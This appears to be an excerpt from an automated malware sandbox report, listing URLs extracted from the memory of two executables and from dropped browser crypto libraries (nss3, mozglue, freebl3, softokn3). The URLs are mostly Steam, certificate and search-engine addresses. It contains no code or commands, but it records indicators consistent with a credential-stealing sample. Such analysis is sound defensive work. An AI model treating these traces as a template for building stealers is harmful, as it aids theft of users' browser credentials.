Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 28d9ab8742.exe, 0000001A.00000003.2863482302.0000000005788000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996995059.0000000005EC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2522999551.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2522825623.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 28d9ab8742.exe, 0000001A.00000003.2863482302.0000000005788000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996995059.0000000005EC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 28d9ab8742.exe, 0000001A.00000003.2863482302.0000000005788000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996995059.0000000005EC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Reporting and NEL.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://assets.msn.cn/resolver/
Source: 0e09cae2-b3ca-49c8-af40-a29526af4444.tmp.10.dr String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://assets.msn.com/resolver/
Source: 28d9ab8742.exe, 0000001F.00000002.3051651389.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7
Source: 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfc9%
Source: 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfm3/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875512562.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3007244384.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3009195039.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875512562.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3007244384.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3009195039.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.10.dr String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://c.msn.com/
Source: 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000002.3026569663.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2973952651.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.W
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2358800633.000000002327D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848879088.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2980327399.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr, ECGDBAEH.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2358800633.000000002327D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848879088.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2980327399.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr, ECGDBAEH.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowere
Source: 28d9ab8742.exe, 0000001A.00000003.2973952651.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: manifest.json.8.dr String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.8.dr String found in binary or memory: https://chromewebstore.google.com/
Source: 0e09cae2-b3ca-49c8-af40-a29526af4444.tmp.10.dr String found in binary or memory: https://clients2.google.com
Source: 0e09cae2-b3ca-49c8-af40-a29526af4444.tmp.10.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fa
Source: 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.c
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&a
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&amp
Source: 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=KLqJaM1v
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=TONm
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
